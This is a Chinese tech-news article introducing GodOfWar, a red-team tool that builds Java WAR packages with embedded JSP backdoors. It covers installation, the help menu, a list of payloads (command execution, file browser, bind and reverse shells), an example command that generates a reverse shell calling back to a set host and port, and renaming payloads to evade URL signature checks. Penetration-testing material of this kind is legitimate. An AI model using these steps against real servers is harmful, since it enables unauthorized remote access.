内容简介:今天给大家介绍的是一款名叫GodOfWar的开源Java WAR构建工具,在该工具的帮助下,研究人员可以轻松向Java WAR包中嵌入恶意Payload。GodOfWar采用Ruby开发,是一款专用于生成恶意WAR Payload的命令行工具,该工具仅限于渗透测试或红队研究使用。
今天给大家介绍的是一款名叫GodOfWar的开源Java WAR构建工具,在该 工具 的帮助下,研究人员可以轻松向Java WAR包中嵌入恶意Payload。
GodOfWar采用 Ruby 开发,是一款专用于生成恶意WAR Payload的命令行工具,该工具仅限于渗透测试或红队研究使用。
功能介绍
1、 已嵌入的Payload(尝试命令-l/–list)
-cmd_get -filebrowser -bind_shell -reverse_shell -reverse_shell_ui
2、可配置的后门(尝试命令–host/–port)
3、Payload名称控制
-修改恶意Payload名称,绕过URL签名验证机制
工具安装
$ gem install godofwar
工具使用
$godofwar -h
Helpmenu:
-p, --payload PAYLOAD 利用已有Payload生成恶意WAR文件
(check-l/--list)
-H, --host IP_ADDR 设置指定Payload的本地或远程IP地址
(used with -p/--payload)
-P, --port PORT 设置指定Payload的本地或远程端口号
(usedwith -p/--payload)
-o, --output [FILE] 输出文件并设置开发名称
(default isthe payload original name. check '-l/--list')
-l, --list 枚举所有可用的Payload
-h, --help 显示帮助信息
使用样例
枚举所有Payload:
$godofwar -l
├── cmd_get
│ └── Information:
│ ├── Description:Command execution via web interface
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settingsrequired!"}
│ ├── Usage: http://host/cmd.jsp?cmd=whoami
│ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│ └── Information:
│ ├── Description: Remotefile browser, upload, download, unzip files and native command execution
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settingsrequired!"}
│ ├── Usage: http://host/filebrowser.jsp
│ ├── References: ["http://www.vonloesch.de/filebrowser.html"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│ └── Information:
│ ├── Description: TCPbind shell
│ ├── OS: any
│ ├── Settings: {"port"=>4444,"false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse-shell.jsp
│ ├── References: ["Metasploit - msfvenom -pjava/jsp_shell_bind_tcp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│ └── Information:
│ ├── Description: TCPreverse shell with a HTML form to set LHOST and LPORT from browser.
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker","port"=>4444, "false"=>"No Settingsrequired!"}
│ ├── Usage: http://host/reverse_shell_ui.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│ └── Information:
│ ├── Description: TCPreverse shell. LHOST and LPORT are hardcoded
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker","port"=>4444, "false"=>"No Settingsrequired!"}
│ ├── Usage: http://host/reverse_shell.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
生成Payload并配置LHOST和LPORT:
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
开发完成之后,你可以进入( http://host:8080/puppy/puppy.jsp )来访问你的shell。
添加额外后门支持
1、 在payloads目录下创建一个新的文件夹。
2、 把自己开发的jsp文件存放到这个文件夹中。
3、 更新payloads_info.json文件中的下列参数:
-文件描述 -支持的操作系统(尽量覆盖所有操作系统) -配置信息:默认主机和端口号 -引用:Payload的原始创建者信息
项目地址
GodOfWar:【 GitHub传送门 】
许可证协议
本项目遵循 MIT开源许可证协议 。
* 参考来源: godofwar ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM
以上所述就是小编给大家介绍的《GodOfWar:可嵌入恶意Payload的JavaWAR构建工具》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
- 插入恶意URL到office嵌入视频中
- 在Office文档的嵌入式视频中插入恶意URL的感染流程分析
- Buf早餐铺 | Oracle WebLogic服务器上被黑客嵌入门罗币挖矿脚本;第一款Kotlin语言开发的安卓恶意...
- 用go来做嵌入式开发-嵌入资源简化程序部署
- ActiveMQ嵌入Tomcat
- 词嵌入的那些事儿(一)
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
